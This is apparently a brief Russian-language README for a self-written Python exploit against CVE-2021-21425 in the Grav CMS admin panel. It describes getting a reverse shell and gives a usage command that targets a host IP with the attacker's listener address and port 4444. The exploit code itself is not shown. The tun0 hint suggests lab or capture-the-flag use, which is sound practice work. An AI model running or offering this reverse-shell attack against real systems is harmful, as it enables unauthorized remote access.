
Скрипт эксплойта на Python для CVE-2021-21425, нацеленный на панель администратора Grav CMS, обеспечивающий обратную оболочку через HTTP POST запрос с настраиваемыми LHOST и LPORT.
это моя версия, я нашел много в интернете, но они слишком плохие
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
ждать.. 60 секунд - вы получите shell на ваш listener